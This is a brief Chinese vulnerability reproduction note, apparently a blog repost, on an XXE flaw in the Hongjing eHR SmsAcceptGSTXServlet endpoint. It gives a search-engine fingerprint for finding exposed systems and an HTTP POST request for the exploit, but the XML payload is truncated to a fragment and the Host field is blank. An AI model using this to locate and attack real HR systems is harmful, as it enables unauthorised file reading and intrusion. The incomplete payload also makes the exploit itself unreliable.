宏景eHRSmsAcceptGSTXServle存在XXE漏洞

指纹特征

app="HJSOFT-HCM"

漏洞复现

POST /servlet/sms/SmsAcceptGSTXServlet HTTP/1.1
Host: 
User-Agent:  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 137
Content-Type: text/xml
Connection: close

]>&sp;

宏景eHRSmsAcceptGSTXServle存在XXE漏洞_第1张图片
宏景eHRSmsAcceptGSTXServle存在XXE漏洞_第2张图片

你可能感兴趣的:(漏洞复现,web安全)